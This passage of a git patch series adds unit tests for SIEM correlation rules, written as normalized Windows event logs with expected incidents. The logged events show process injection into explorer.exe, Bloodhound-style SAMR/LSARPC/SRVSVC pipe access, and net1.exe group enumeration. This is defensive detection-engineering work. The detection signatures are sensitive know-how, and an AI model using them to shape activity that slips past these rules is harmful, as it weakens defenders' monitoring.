.../Suspicious_Explorer_Injection/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc new file mode 100644 index 00000000..ac1a1c8f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Suspicious_Explorer_Injection/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T07:26:34.1336380Z\"},\"EventRecordID\":\"8484\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1876\",\"ThreadID\":\"1444\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 07:26:34.133\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-f7c9-5cc7-0000-0010bf010e00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"3772\"},{\"Name\":\"SourceImage\",\"text\":\"\\\\\\\\vboxsrv\\\\HTools\\\\m.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-f6c9-5cc7-0000-0010135f0600}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2812\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"840\"},{\"Name\":\"StartAddress\",\"text\":\"0x02060000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x02060000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.id": "840", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "365abb72-f6c9-5cc7-0000-0010135f0600", "object.process.id": "2812", "object.process.name": "explorer.exe", "object.process.path": "c:\\windows\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T10:14:19.088Z", "status": "success", "subject": "process", "subject.process.fullpath": "\\\\vboxsrv\\htools\\m.exe", "subject.process.guid": "365abb72-f7c9-5cc7-0000-0010bf010e00", "subject.process.id": "3772", "subject.process.name": "m.exe", "subject.process.path": "\\\\vboxsrv\\htools\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T07:26:34.133Z", "type": "raw", "uuid": "3bf455ed-68e6-46f9-83b5-ae2345533b3d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.key": "\\\\vboxsrv\\htools\\m.exe", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Process Injection", "correlation_name": "Suspicious_Explorer_Injection", "correlation_type": "incident", "datafield6": "0x02060000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Suspicious_Explorer_Injection|iewin7|m.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "thread", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "365abb72-f6c9-5cc7-0000-0010135f0600", "object.process.id": "2812", "object.process.name": "explorer.exe", "object.process.path": "c:\\windows\\", "status": "success", "subject": "process", "subject.process.fullpath": "\\\\vboxsrv\\htools\\m.exe", "subject.process.guid": "365abb72-f7c9-5cc7-0000-0010bf010e00", "subject.process.id": "3772", "subject.process.name": "m.exe", "subject.process.path": "\\\\vboxsrv\\htools\\"} From 2e5488c8fd6a7a78c75e89f2ab868c261ea4e750 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 13:32:51 +0300 Subject: [PATCH 29/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Bloodhound)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_discovery/Bloodhound/tests/test_1.sc | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc new file mode 100644 index 00000000..da7d81f5 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc @@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-01-20T07:02:45.4093218Z\"},\"EventRecordID\":\"32857\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"436\",\"ThreadID\":\"444\"},\"Channel\":\"Security\",\"Computer\":\"WIN-77LTAPHIQ1R.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x13659d\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"10.0.2.17\"},{\"Name\":\"IpPort\",\"text\":\"49420\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"samr\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", "event_src.hostname": "win-77ltaphiq1r", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\samr", "object.name": "samr", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\samr", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "samr", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T18:47:21.735Z", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "1271197", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-01-20T07:02:45.409Z", "type": "raw", "uuid": "b4d20c05-8b7f-4fbd-9809-5ae442ebd83b"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-01-20T07:02:45.4249182Z\"},\"EventRecordID\":\"32858\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"436\",\"ThreadID\":\"444\"},\"Channel\":\"Security\",\"Computer\":\"WIN-77LTAPHIQ1R.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x13659d\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"10.0.2.17\"},{\"Name\":\"IpPort\",\"text\":\"49420\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"lsarpc\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", "event_src.hostname": "win-77ltaphiq1r", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\lsarpc", "object.name": "lsarpc", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\lsarpc", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "lsarpc", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T18:47:21.736Z", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "1271197", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-01-20T07:02:45.424Z", "type": "raw", "uuid": "a13d15b6-e9f0-4b43-a2f3-5c5fef6fd0f7"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-01-20T07:02:45.5501125Z\"},\"EventRecordID\":\"32862\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"436\",\"ThreadID\":\"444\"},\"Channel\":\"Security\",\"Computer\":\"WIN-77LTAPHIQ1R.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x13659d\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"10.0.2.17\"},{\"Name\":\"IpPort\",\"text\":\"49420\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"srvsvc\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", "event_src.hostname": "win-77ltaphiq1r", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\srvsvc", "object.name": "srvsvc", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\srvsvc", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "srvsvc", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T18:47:21.736Z", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "1271197", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-01-20T07:02:45.550Z", "type": "raw", "uuid": "d2931e0d-8404-474d-affa-180bf644e712"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "alert.key": "samr, lsarpc, srvsvc", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Bloodhound", "correlation_type": "incident", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", "event_src.hostname": "win-77ltaphiq1r", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.category": "Undefined", "incident.severity": "medium", "object": "file_object", "object.fullpath": "\\ipc$\\srvsvc", "object.name": "srvsvc", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\srvsvc", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "srvsvc", "object.storage.path": "\\", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "1271197"} From ea42aecd0356c0c7ae7ed1cb2b2fa5ea75ab34f9 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 13:39:49 +0300 Subject: [PATCH 30/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Enumerat?= =?UTF-8?q?ion=5FUsers=5FIn=5FGroups)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Enumeration_Users_In_Groups/tests/test_1.sc | 4 ++++ .../Enumeration_Users_In_Groups/tests/test_2.sc | 4 ++++ .../Enumeration_Users_In_Groups/tests/test_3.sc | 4 ++++ 3 files changed, 12 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc new file mode 100644 index 00000000..f0a90af0 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4798\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-05T09:24:56.7402180Z\"},\"EventRecordID\":\"10089\",\"Correlation\":{\"ActivityID\":\"{fdc063de-4b69-0000-5564-c0fd694bd501}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"1948\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-500\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2e47a\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x10b4\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "189562", "datafield2": "0x10b4", "datafield3": "C:\\Windows\\System32\\", "datafield4": "net1.exe", "datafield5": "C:\\Windows\\System32\\net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4798_A_users_local_group_membership_was_enumerated", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4798", "normalized": true, "object": "user_group", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.domain": "msedgewin10", "object.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.name": "administrator", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T17:38:59.816Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.domain": "msedgewin10", "subject.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.name": "ieuser", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-05T09:24:56.740Z", "type": "raw", "uuid": "a16eaf89-f02f-46ab-a0b0-c11d7800fb51"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.context": "administrator|", "alert.key": "net1.exe|ieuser", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Enumeration_Users_In_Groups", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Enumeration_Users_In_Groups|msedgewin10|s-1-5-21-3461203602-4096304019-2269080069-1000", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.name": "administrator", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc new file mode 100644 index 00000000..af41e4ee --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4798\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-05T09:24:56.7742573Z\"},\"EventRecordID\":\"10090\",\"Correlation\":{\"ActivityID\":\"{fdc063de-4b69-0000-5564-c0fd694bd501}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"1948\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-500\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2e47a\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x10b4\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "189562", "datafield2": "0x10b4", "datafield3": "C:\\Windows\\System32\\", "datafield4": "net1.exe", "datafield5": "C:\\Windows\\System32\\net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4798_A_users_local_group_membership_was_enumerated", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4798", "normalized": true, "object": "user_group", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.domain": "msedgewin10", "object.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.name": "administrator", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T17:39:07.135Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.domain": "msedgewin10", "subject.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.name": "ieuser", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-05T09:24:56.774Z", "type": "raw", "uuid": "2cbb9a35-9af7-484a-9d62-d969dc501d1f"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.context": "administrator|", "alert.key": "net1.exe|ieuser", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Enumeration_Users_In_Groups", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Enumeration_Users_In_Groups|msedgewin10|s-1-5-21-3461203602-4096304019-2269080069-1000", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.name": "administrator", "object.type": "local security-enabled", "status": "success", "subject": "account", 